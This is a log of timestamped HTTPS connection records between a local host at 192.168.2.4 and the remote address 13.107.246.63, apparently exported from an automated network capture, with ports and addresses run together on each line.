                                                                                                            Dec 3, 2024 10:06:12.652475119 CET4434977613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:12.652539968 CET49776443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.652668953 CET49776443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:12.652682066 CET4434977613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.010718107 CET4434977313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.015264034 CET49773443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.015317917 CET4434977313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.016252995 CET49773443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.016268015 CET4434977313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.040431023 CET4434977213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.042134047 CET49772443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.042162895 CET4434977213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.042532921 CET49772443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.042537928 CET4434977213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.207557917 CET4434977413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.211057901 CET49774443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.211091042 CET4434977413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.211479902 CET49774443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.211483955 CET4434977413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.411488056 CET4434977513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.415241957 CET49775443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.415263891 CET4434977513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.415751934 CET49775443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.415760994 CET4434977513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.434695005 CET4434977613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.438781977 CET49776443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.438806057 CET4434977613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.439254045 CET49776443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.439282894 CET4434977613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.455885887 CET4434977313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.455965042 CET4434977313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.456154108 CET49773443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.456419945 CET49773443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.456439972 CET4434977313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.456451893 CET49773443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.456459045 CET4434977313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.460351944 CET49777443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.460391045 CET4434977713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.460505962 CET49777443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.460664034 CET49777443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.460678101 CET4434977713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.494364023 CET4434977213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.494446993 CET4434977213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.494523048 CET49772443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.494854927 CET49772443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.494874001 CET4434977213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.494894028 CET49772443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.494899988 CET4434977213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.498693943 CET49778443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.498732090 CET4434977813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.498806000 CET49778443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.498955965 CET49778443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.498970985 CET4434977813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.662691116 CET4434977413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.662755013 CET4434977413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.662831068 CET49774443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.679261923 CET49774443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.679261923 CET49774443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.679280996 CET4434977413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.679289103 CET4434977413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.728441000 CET49779443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.728472948 CET4434977913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.728537083 CET49779443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.754604101 CET49779443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.754617929 CET4434977913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.857383013 CET4434977513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.857439995 CET4434977513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.857490063 CET49775443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.872308969 CET49775443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.872323036 CET4434977513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.872350931 CET49775443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.872355938 CET4434977513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.878674030 CET4434977613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.878737926 CET4434977613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.878784895 CET49776443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.880917072 CET49776443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.880925894 CET4434977613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.880954981 CET49776443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.880959034 CET4434977613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.882596016 CET49780443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.882611036 CET4434978013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.882683992 CET49780443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.883995056 CET49781443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.884025097 CET4434978113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.884080887 CET49781443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.884114027 CET49780443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.884125948 CET4434978013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:14.884462118 CET49781443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:14.884473085 CET4434978113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.283301115 CET4434977813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.283883095 CET49778443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.283904076 CET4434977813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.284517050 CET49778443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.284522057 CET4434977813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.307404995 CET4434977713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.317253113 CET49777443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.317282915 CET4434977713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.317729950 CET49777443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.317735910 CET4434977713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.538367987 CET4434977913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.538882017 CET49779443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.538899899 CET4434977913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.539365053 CET49779443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.539370060 CET4434977913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.664202929 CET4434978013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.677048922 CET49780443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.677072048 CET4434978013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.677500963 CET49780443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.677506924 CET4434978013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.731401920 CET4434978113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.731829882 CET49781443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.731849909 CET4434978113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.732254028 CET49781443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.732259035 CET4434978113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.750767946 CET4434977813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.750828028 CET4434977813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.750876904 CET49778443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.751060009 CET49778443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.751075029 CET4434977813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.751085043 CET49778443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.751090050 CET4434977813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.753746033 CET49782443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.753767967 CET4434978213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.753845930 CET49782443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.753954887 CET49782443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.753966093 CET4434978213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.760763884 CET4434977713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.760817051 CET4434977713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.760865927 CET49777443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.760951996 CET49777443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.760965109 CET4434977713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.760973930 CET49777443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.760978937 CET4434977713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.762732983 CET49783443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.762759924 CET4434978313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.762825012 CET49783443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.762938976 CET49783443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.762948990 CET4434978313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.983407021 CET4434977913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.983452082 CET4434977913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.983501911 CET49779443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.983719110 CET49779443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.983725071 CET4434977913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.983735085 CET49779443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.983740091 CET4434977913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.987550974 CET49784443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.987586021 CET4434978413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:16.987643003 CET49784443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.990941048 CET49784443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:16.990956068 CET4434978413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.108627081 CET4434978013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.108685017 CET4434978013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.108737946 CET49780443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.109019995 CET49780443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.109030008 CET4434978013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.109040976 CET49780443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.109045029 CET4434978013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.112359047 CET49785443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.112406015 CET4434978513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.112464905 CET49785443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.112824917 CET49785443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.112838984 CET4434978513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.185259104 CET4434978113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.185326099 CET4434978113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.185374022 CET49781443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.185830116 CET49781443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.185847998 CET4434978113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.185856104 CET49781443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.185862064 CET4434978113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.188477039 CET49786443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.188498020 CET4434978613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:17.188560009 CET49786443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.189893007 CET49786443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:17.189907074 CET4434978613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.544694901 CET4434978213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.545372009 CET49782443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.545394897 CET4434978213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.545896053 CET49782443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.545902967 CET4434978213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.556898117 CET4434978313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.557667017 CET49783443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.557687998 CET4434978313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.557933092 CET49783443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.557938099 CET4434978313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.707619905 CET4434978413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.708250046 CET49784443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.708285093 CET4434978413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.708657026 CET49784443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.708662987 CET4434978413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.904445887 CET4434978613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.905011892 CET49786443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.905078888 CET4434978613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.905463934 CET49786443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.905472040 CET4434978613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.958384037 CET4434978513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.959342957 CET49785443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.959378958 CET4434978513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.959721088 CET49785443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.959728003 CET4434978513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.990848064 CET4434978213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.990910053 CET4434978213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.991066933 CET49782443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.991142988 CET49782443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.991159916 CET4434978213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.991168976 CET49782443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.991173983 CET4434978213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.994098902 CET49787443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.994136095 CET4434978713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:18.994194984 CET49787443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.994589090 CET49787443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:18.994597912 CET4434978713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.004179955 CET4434978313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.004241943 CET4434978313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.004287958 CET49783443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.004486084 CET49783443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.004486084 CET49783443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.004503012 CET4434978313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.004511118 CET4434978313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.006619930 CET49788443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.006664038 CET4434978813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.006726027 CET49788443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.006834030 CET49788443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.006850004 CET4434978813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.142658949 CET4434978413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.142728090 CET4434978413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.142784119 CET49784443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.143057108 CET49784443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.143057108 CET49784443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.143076897 CET4434978413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.143085003 CET4434978413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.145704031 CET49789443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.145737886 CET4434978913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.145795107 CET49789443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.145922899 CET49789443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.145936012 CET4434978913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.339147091 CET4434978613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.339211941 CET4434978613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.339370012 CET49786443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.339472055 CET49786443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.339483023 CET4434978613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.339490891 CET49786443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.339497089 CET4434978613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.342272043 CET49790443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.342314959 CET4434979013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.342389107 CET49790443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.342503071 CET49790443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.342518091 CET4434979013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.411497116 CET4434978513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.411555052 CET4434978513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.411747932 CET49785443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.424256086 CET49785443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.424278975 CET4434978513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.424288988 CET49785443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.424293995 CET4434978513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.431628942 CET49791443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.431664944 CET4434979113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:19.431721926 CET49791443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.432285070 CET49791443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:19.432296991 CET4434979113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:20.708967924 CET4434978713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:20.709577084 CET49787443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:20.709600925 CET4434978713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:20.709983110 CET49787443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:20.709988117 CET4434978713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:20.740051031 CET4434978813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:20.740595102 CET49788443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:20.740616083 CET4434978813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:20.740849018 CET49788443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:20.740854979 CET4434978813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:20.929095030 CET4434978913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:20.933088064 CET49789443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:20.933103085 CET4434978913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:20.933509111 CET49789443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:20.933516026 CET4434978913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.062699080 CET4434979013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.064935923 CET49790443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.064958096 CET4434979013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.065366030 CET49790443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.065371037 CET4434979013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.144422054 CET4434978713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.144490004 CET4434978713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.144541025 CET49787443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.144730091 CET49787443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.144747972 CET4434978713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.144793034 CET49787443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.144798040 CET4434978713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.147572994 CET49792443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.147610903 CET4434979213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.147973061 CET49792443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.148556948 CET4434979113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.154607058 CET49792443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.154624939 CET4434979213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.155334949 CET49791443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.155349016 CET4434979113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.155797958 CET49791443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.155802965 CET4434979113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.178977966 CET4434978813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.179037094 CET4434978813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.179145098 CET49788443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.179655075 CET49788443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.179667950 CET4434978813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.183597088 CET49793443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.183620930 CET4434979313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.183693886 CET49793443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.186307907 CET49793443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.186319113 CET4434979313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.372947931 CET4434978913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.373008013 CET4434978913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.373178959 CET49789443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.373272896 CET49789443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.373285055 CET4434978913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.373295069 CET49789443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.373300076 CET4434978913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.375868082 CET49794443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.375883102 CET4434979413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.376036882 CET49794443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.376302958 CET49794443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.376316071 CET4434979413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.497201920 CET4434979013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.497267008 CET4434979013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:21.497380018 CET49790443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:21.497515917 CET49790443192.168.2.413.107.246.63
